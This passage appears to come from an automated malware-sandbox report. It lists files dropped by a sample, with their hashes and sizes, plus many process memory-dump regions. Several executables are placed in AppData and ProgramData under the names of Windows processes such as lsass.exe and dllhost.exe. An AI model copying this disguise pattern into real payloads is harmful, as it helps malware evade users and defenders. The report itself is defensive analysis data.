a9b173898e2639d27e7a3c16f8bb67107a5a037c

SHA256
65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49

SHA512
c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
781c3c16134f528d2a21882b21b2aa5b

SHA1
a9b173898e2639d27e7a3c16f8bb67107a5a037c

SHA256
65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49

SHA512
c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
781c3c16134f528d2a21882b21b2aa5b

SHA1
a9b173898e2639d27e7a3c16f8bb67107a5a037c

SHA256
65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49

SHA512
c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
781c3c16134f528d2a21882b21b2aa5b

SHA1
a9b173898e2639d27e7a3c16f8bb67107a5a037c

SHA256
65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49

SHA512
c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
781c3c16134f528d2a21882b21b2aa5b

SHA1
a9b173898e2639d27e7a3c16f8bb67107a5a037c

SHA256
65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49

SHA512
c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
781c3c16134f528d2a21882b21b2aa5b

SHA1
a9b173898e2639d27e7a3c16f8bb67107a5a037c

SHA256
65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49

SHA512
c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
1.6MB

MD5
08e3930a42197a422d064569c4778997

SHA1
74832aa332b48422e5d448f5099b397e84c18712

SHA256
322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813

SHA512
b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
1.6MB

MD5
08e3930a42197a422d064569c4778997

SHA1
74832aa332b48422e5d448f5099b397e84c18712

SHA256
322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813

SHA512
b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

Download Submit
C:\Users\Admin\AppData\Roaming\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\programdata\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\??\c:\users\admin\appdata\roaming\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\ProgramData\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
memory/576-94-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/576-77-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/576-95-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/576-74-0x000000001B240000-0x000000001B522000-memory.dmp

Filesize
2.9MB

Download
memory/576-75-0x0000000002300000-0x0000000002308000-memory.dmp

Filesize
32KB

Download
memory/576-99-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/576-87-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/576-100-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/576-76-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/576-89-0x0000000002630000-0x00000000026B0000-memory.dmp

Filesize
512KB

Download
memory/844-157-0x000000013FCB0000-0x000000014067A000-memory.dmp

Filesize
9.8MB

Download
memory/876-79-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/876-82-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/876-84-0x00000000028EB000-0x0000000002922000-memory.dmp

Filesize
220KB

Download
memory/876-78-0x00000000028E0000-0x0000000002960000-memory.dmp

Filesize
512KB

Download
memory/1004-152-0x0000000000D40000-0x0000000000D80000-memory.dmp

Filesize
256KB

Download
memory/1004-151-0x0000000000310000-0x0000000000730000-memory.dmp

Filesize
4.1MB

Download
memory/1004-140-0x0000000000310000-0x0000000000730000-memory.dmp

Filesize
4.1MB

Download
memory/1004-173-0x0000000000310000-0x0000000000730000-memory.dmp

Filesize
4.1MB

Download
memory/1456-128-0x000000013F230000-0x000000013FBFA000-memory.dmp

Filesize
9.8MB

Download
memory/1544-123-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1544-124-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1544-125-0x000000000269B000-0x00000000026D2000-memory.dmp

Filesize
220KB

Download
memory/1544-122-0x0000000002690000-0x0000000002710000-memory.dmp

Filesize
512KB

Download
memory/1584-54-0x0000000000380000-0x000000000039C000-memory.dmp

Filesize
112KB

Download
memory/1736-211-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-132-0x0000000004350000-0x0000000004351000-memory.dmp

Filesize
4KB

Download
memory/1736-131-0x0000000004380000-0x0000000004381000-memory.dmp

Filesize
4KB

Download
memory/1736-130-0x0000000004360000-0x0000000004361000-memory.dmp

Filesize
4KB

Download
memory/1736-129-0x0000000004370000-0x0000000004371000-memory.dmp

Filesize
4KB

Download
memory/1736-121-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-181-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-184-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-190-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-194-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-199-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-203-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-207-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-160-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-215-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-219-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1736-222-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1764-96-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1764-85-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1764-90-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1764-98-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1764-86-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1764-101-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1764-97-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1764-83-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/1768-81-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/1768-92-0x0000000002820000-0x000000000282E000-memory.dmp

Filesize
56KB

Download
memory/1768-80-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/1768-88-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/1768-93-0x000000001B1C0000-0x000000001B1D0000-memory.dmp

Filesize
64KB

Download
memory/1768-91-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/1832-148-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1832-149-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1832-150-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1860-192-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-196-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-208-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-224-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-176-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-188-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-220-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-185-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-187-0x0000000003100000-0x0000000003140000-memory.dmp

Filesize
256KB

Download
memory/1860-179-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-177-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-216-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-200-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-178-0x0000000003100000-0x0000000003140000-memory.dmp

Filesize
256KB

Download
memory/1860-212-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1860-204-0x00000000012A0000-0x00000000016C0000-memory.dmp

Filesize
4.1MB

Download
memory/1880-182-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1880-186-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2040-195-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2040-210-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2040-180-0x00000000003C0000-0x00000000003E0000-memory.dmp

Filesize
128KB

Download
memory/2040-206-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2040-214-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2040-202-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2040-183-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2040-218-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2040-198-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2040-158-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/2040-223-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2040-191-0x00000000003C0000-0x00000000003E0000-memory.dmp

Filesize
128KB

Download
memory/2040-189-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download